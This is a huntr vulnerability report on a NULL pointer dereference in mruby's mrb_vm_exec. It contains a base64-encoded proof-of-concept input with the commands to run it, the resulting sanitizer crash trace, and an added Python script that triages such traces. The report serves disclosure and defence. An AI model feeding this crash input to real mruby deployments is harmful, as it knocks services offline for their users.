NULL Pointer Dereference

huntr report 68E09EC1-6CC7-48B8-981D-30F478C70276
Published: 2022-03-07 14:41:50
Reporter: octaviogalland
Source: www.huntr.dev

CVSS3: 5.5 Medium
Attack Vector: LOCAL
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: REQUIRED
Scope: UNCHANGED
Confidentiality Impact: NONE
Integrity Impact: NONE
Availability Impact: HIGH
Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

CVSS2: 7.1 High
Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: NONE
Integrity Impact: NONE
Availability Impact: COMPLETE
Vector: AV:N/AC:M/Au:N/C:N/I:N/A:C

EPSS: 0.001 Low
Percentile: 22.0%

Description

There is a NULL pointer dereference in mrb_vm_exec (vm.c:1929). The bug was found on the latest mruby commit at the time (hash c2f7ed514dfa0fcae2e7e72d51f25be3d3d6d72c) on Ubuntu 20.04 for x86_64/amd64.

Proof of Concept

1- Clone the repository and build it with ASAN using MRUBY_CONFIG=build_config/clang-asan.rb rake.

2- Use mruby to execute the poc (it is base64-encoded since it contains unprintable characters):

$ echo -ne 'Yj0iMCIKezA9Pm5pbH0KW11hbmQKYi5jb2RlcG9pbnRze2luc3RhbmNlX2V2YWx7bG9vcC5uZXh0
e30KYi5jb2RlcG9pbnRze0ZpYmVyLm5ld3t9LnRyYW5zZmVyKDAsMCwwLDAsMCwwLDAsMCwwLDAs
MCwwLDAsMCwwKX19fQ==' | base64 -d > poc
$ mruby poc
/home/faraday/mruby/src/vm.c:1929:16: runtime error: member access within misaligned address 0x000000000001 for type 'struct RArray', which requires 8 byte alignment
0x000000000001: note: pointer points here
<memory cannot be printed>
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /home/faraday/mruby/src/vm.c:1929:16 in 
AddressSanitizer:DEADLYSIGNAL
=================================================================
==36117==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000011 (pc 0x0000006f01ea bp 0x7fffb088c190 sp 0x7fffb086aa60 T0)
==36117==The signal is caused by a READ memory access.
==36117==Hint: address points to the zero page.
    #0 0x6f01ea in mrb_vm_exec /home/faraday/mruby/src/vm.c:1929:16
    #1 0x6b0ca9 in mrb_vm_run /home/faraday/mruby/src/vm.c:1130:12
    #2 0x6a5a79 in mrb_top_run /home/faraday/mruby/src/vm.c:3039:12
    #3 0x8b0ef1 in mrb_load_exec /home/faraday/mruby/mrbgems/mruby-compiler/core/parse.y:6890:7
    #4 0x8b2b56 in mrb_load_detect_file_cxt /home/faraday/mruby/mrbgems/mruby-compiler/core/parse.y:6933:12
    #5 0x4c6420 in main /home/faraday/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:357:11
    #6 0x7f8c3f9ff0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #7 0x41c85d in _start (/home/faraday/mruby/build/host/bin/mruby+0x41c85d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/faraday/mruby/src/vm.c:1929:16 in mrb_vm_exec
==36117==ABORTING

Impact

This vulnerability can crash the mruby interpreter, affecting the availability of the system.
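The sanitizer output in the proof of concept carries everything needed to confirm the impact statement above without re-running the crash. As an added example (written for this page, not part of the huntr report or the mruby project), the following Python script parses a report of that shape, embedded below as a constructed sample copied from the output above with the lower frames trimmed. It pulls out the fault address, the access type, the top frame, and, from the UBSan misalignment line, the pointer value and the offset of the struct member being read, then classifies a READ fault below the first page as a NULL-based dereference whose impact is availability only. The names triage, Triage and ZERO_PAGE_LIMIT are this example's own, and the 4 KiB zero-page boundary is an assumption.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: the UBSan/ASan output quoted in the report above, with
# the frames below mrb_load_exec trimmed.
SAMPLE_REPORT = """\
/home/faraday/mruby/src/vm.c:1929:16: runtime error: member access within misaligned address 0x000000000001 for type 'struct RArray', which requires 8 byte alignment
0x000000000001: note: pointer points here
<memory cannot be printed>
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /home/faraday/mruby/src/vm.c:1929:16 in
AddressSanitizer:DEADLYSIGNAL
=================================================================
==36117==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000011 (pc 0x0000006f01ea bp 0x7fffb088c190 sp 0x7fffb086aa60 T0)
==36117==The signal is caused by a READ memory access.
==36117==Hint: address points to the zero page.
    #0 0x6f01ea in mrb_vm_exec /home/faraday/mruby/src/vm.c:1929:16
    #1 0x6b0ca9 in mrb_vm_run /home/faraday/mruby/src/vm.c:1130:12
    #2 0x6a5a79 in mrb_top_run /home/faraday/mruby/src/vm.c:3039:12
    #3 0x8b0ef1 in mrb_load_exec /home/faraday/mruby/mrbgems/mruby-compiler/core/parse.y:6890:7
SUMMARY: AddressSanitizer: SEGV /home/faraday/mruby/src/vm.c:1929:16 in mrb_vm_exec
==36117==ABORTING
"""

# Assumption: 4 KiB pages, so a fault address below 0x1000 lies in the never-mapped
# zero page and is a dereference through a NULL (or near-NULL) pointer.
ZERO_PAGE_LIMIT = 0x1000

SEGV_RE = re.compile(r"ERROR: AddressSanitizer: (\w+) on unknown address 0x([0-9a-f]+)")
ACCESS_RE = re.compile(r"signal is caused by a (READ|WRITE) memory access")
FRAME0_RE = re.compile(r"^\s*#0 0x[0-9a-f]+ in (\S+) (\S+)", re.MULTILINE)
UBSAN_RE = re.compile(r"misaligned address 0x([0-9a-f]+) for type '([^']+)'")


@dataclass
class Triage:
    sanitizer_error: str          # e.g. SEGV
    fault_addr: int               # address ASan reports the fault at
    access: str                   # READ, WRITE or unknown
    top_function: str             # function in frame #0
    top_location: str             # file:line:col of frame #0
    base_pointer: Optional[int]   # pointer value from the UBSan misalignment line, if present
    member_offset: Optional[int]  # fault_addr - base_pointer: offset of the field being accessed
    struct_type: Optional[str]    # type UBSan says the pointer was treated as
    null_deref: bool
    likely_impact: str


def triage(report: str) -> Triage:
    """Classify one sanitizer crash report; raises ValueError if no ASan SEGV record is present."""
    m = SEGV_RE.search(report)
    if m is None:
        raise ValueError("no AddressSanitizer SEGV record found")
    error, fault_addr = m.group(1), int(m.group(2), 16)

    acc = ACCESS_RE.search(report)
    access = acc.group(1) if acc else "unknown"

    f0 = FRAME0_RE.search(report)
    top_function, top_location = (f0.group(1), f0.group(2)) if f0 else ("?", "?")

    ub = UBSAN_RE.search(report)
    base_pointer = int(ub.group(1), 16) if ub else None
    struct_type = ub.group(2) if ub else None
    member_offset = None
    if base_pointer is not None and fault_addr >= base_pointer:
        member_offset = fault_addr - base_pointer

    null_deref = fault_addr < ZERO_PAGE_LIMIT
    if null_deref and access == "READ":
        likely_impact = "availability only: read through a NULL-based pointer crashes the process; no disclosure or corruption primitive evident"
    elif access == "WRITE":
        likely_impact = "needs deeper analysis: a write fault may become memory corruption"
    else:
        likely_impact = "undetermined from sanitizer output alone"

    return Triage(error, fault_addr, access, top_function, top_location,
                  base_pointer, member_offset, struct_type, null_deref, likely_impact)


if __name__ == "__main__":
    t = triage(SAMPLE_REPORT)
    print(f"{t.sanitizer_error} at {hex(t.fault_addr)} ({t.access}) in {t.top_function} {t.top_location}")
    print(f"base pointer {t.base_pointer}, member offset {t.member_offset}, type {t.struct_type}")
    print("NULL deref:", t.null_deref, "->", t.likely_impact)
```

On the sample the script reports a READ fault at 0x11 in mrb_vm_exec with the pointer value 0x1 and a member offset of 0x10, which is consistent with a near-NULL pointer being used as a struct RArray and matches the availability-only rating in the CVSS vectors.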

Acknowledgements

This bug was found by Octavio Gianatiempo ([email protected]) and Octavio Galland ([email protected]) from Faraday Research Team.
